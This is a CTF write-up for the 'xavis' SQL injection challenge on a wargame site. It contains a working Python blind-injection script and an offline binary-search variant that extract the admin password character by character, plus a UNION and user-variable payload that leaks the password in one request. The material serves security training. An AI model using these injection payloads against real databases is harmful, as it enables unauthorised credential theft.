# xavis

This is the initial screen of the challenge.

![](/files/-M-9337ftDMtZuIJWt7o)

Sending the query below shows that `length()` of a single character of pw is 4, i.e. each character of the password is stored as 4 bytes.

![](/files/-M-97KsXPfDoCmGcqlEh)

With that in mind, the Python code is as follows.

`ord()` is used instead of `ascii()`, and `character` ranges over `range(0, 65536)` rather than `range(0, 128)`: `ascii()` only returns the code of the leftmost byte, whereas `ord()` returns the code of the whole multi-byte character, so a Hangul syllable (U+AC00 to U+D7A3) needs the larger search space. Because `chr()` applied to the value `ord()` returns yields the correct character, the column evidently uses an encoding in which `ord()` equals the Unicode code point; on a utf8/utf8mb4 column `ord()` would instead return the packed UTF-8 bytes (over 15,000,000 for any Hangul syllable), and both the upper bound of the search and the `chr()` mapping would have to change.

```python
import requests

URL = 'https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='
PHPSESSID = 'MY_PHPSESSID'   # session cookie of a logged-in LOS account
TRUE_PHRASE = 'Hello admin'  # shown when the injected condition selects the admin row


def query(payload):
    """Boolean oracle: True if the page greets admin for this pw payload.
    %23 is the URL-encoded '#' that comments out the rest of the query."""
    cookies = {'PHPSESSID': PHPSESSID}
    r = requests.get(URL + payload, cookies=cookies)
    return TRUE_PHRASE in r.text


# length(pw) counts bytes; result here: 12
def find_pw_length():
    pw_len = 1
    while not query("' or id='admin' and length(pw)={}%23".format(pw_len)):
        pw_len += 1
    print('pw_len: {}'.format(pw_len))
    return pw_len


# byte length of one character of pw; result here: 4
def find_character_size():
    character_size = 1
    while not query("' or id='admin' and length(substr(pw,1,1))={}%23".format(character_size)):
        character_size += 1
    print('character_size: {}'.format(character_size))
    return character_size


# result here: 우왕굳
def find_pw():
    pw_len = find_pw_length()
    character_size = find_character_size()
    pw = ''
    # number of characters = total bytes / bytes per character
    for pos in range(1, pw_len // character_size + 1):
        # ord() returns the code of the whole multi-byte character, so the
        # candidates are the BMP (0..65535), not 0..127 as with ascii()
        for character in range(0, 65536):
            if query("' or id='admin' and ord(substr(pw,{},1))={}%23".format(pos, character)):
                pw += chr(character)
                break
    print('pw: {}'.format(pw))
    return pw


find_pw()
```

Running it gives pw `우왕굳`.

Visiting [https://los.rubiya.kr/chall/xavis\_04f071ecdadb4296361d2101e4a2c390.php?pw=우왕굳](https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw=%EC%9A%B0%EC%99%95%EA%B5%B3) solves the challenge.

![](/files/-M-CuIqjyLLaWOo0l65t)
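The linear scan above issues up to 65536 requests per character. The following is an added example, not part of the original write-up, that recovers the same pw with a binary search on `ord()` (about 21 requests per character for the full Unicode range) and reads the character count directly with `char_length()` instead of dividing `length()` by the per-character byte size. It runs offline against a constructed oracle that answers the two payload shapes the extractor sends; against the live challenge the page's `query()` function can be passed in its place. `char_length()` being available and `ord()` returning the Unicode code point (as the recovered Hangul implies) are assumptions.

```python
import re

# Constructed secret for the offline simulation: the admin pw this page
# recovered. Against the live challenge, pass the page's query() instead.
SECRET_PW = '우왕굳'


def simulated_oracle(payload: str) -> bool:
    """Offline stand-in for query(): evaluates the two payload shapes the
    extractor sends against SECRET_PW. Assumes ord() yields the Unicode
    code point, as it does for a fixed-width (ucs2/utf16/utf32) column."""
    m = re.fullmatch(r"' or id='admin' and char_length\(pw\)>(\d+)%23", payload)
    if m:
        return len(SECRET_PW) > int(m.group(1))
    m = re.fullmatch(r"' or id='admin' and ord\(substr\(pw,(\d+),1\)\)>(\d+)%23", payload)
    if m:
        pos, n = int(m.group(1)), int(m.group(2))
        return pos <= len(SECRET_PW) and ord(SECRET_PW[pos - 1]) > n
    raise ValueError('unsupported payload: ' + payload)


class CountingOracle:
    """Wraps an oracle and counts how many requests the extraction needs."""

    def __init__(self, oracle):
        self.oracle = oracle
        self.calls = 0

    def __call__(self, payload):
        self.calls += 1
        return self.oracle(payload)


def bisect_value(ask_greater, lo, hi):
    """Return the integer v in [lo, hi] given an oracle answering 'v > n'.
    Needs at most ceil(log2(hi - lo + 1)) questions instead of up to hi - lo."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask_greater(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_pw(oracle, max_len=64, max_code=0x10FFFF):
    """Blind extraction of admin's pw: first the character count, then each
    character's code point by binary search. The oracle takes the raw pw
    payload (with %23 for the '#' comment) and returns True when the
    response shows the admin greeting. max_len/max_code are assumed bounds."""
    pw_len = bisect_value(
        lambda n: oracle("' or id='admin' and char_length(pw)>{}%23".format(n)),
        0, max_len)
    pw = ''
    for pos in range(1, pw_len + 1):
        code = bisect_value(
            lambda n, pos=pos: oracle("' or id='admin' and ord(substr(pw,{},1))>{}%23".format(pos, n)),
            0, max_code)
        pw += chr(code)
    return pw


if __name__ == '__main__':
    oracle = CountingOracle(simulated_oracle)
    print('pw: {}'.format(extract_pw(oracle)))
    print('requests: {}'.format(oracle.calls))
```

The comparison payloads use `>` rather than `=`, which is what turns each unknown value into a binary search; everything else about the injection (the `' or id='admin' and ... %23` shape and the admin-greeting oracle) is unchanged from the page's script.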

There is another solution.

Visiting <https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw=%27%20or%20(select%20@a:=pw%20where%20id=%27admin%27)%20union%20select%20@a%23> shows pw directly, as below.

![](/files/-M-CuThCnCw5YLkFzPDw)

This amounts to putting `' or (select @a:=pw where id='admin') union select @a#` into pw.

The subquery `select @a:=pw where id='admin'` has no `from` clause, so `pw` and `id` refer to the current row of the outer query; for the admin row it assigns that row's pw to the user variable `@a`. The value it returns, the pw string, converts to 0 (false) in the boolean context of `or`, so the first `select` matches no row; the trailing `union select @a` then returns the value stored in `@a` as a result row, which the page displays.

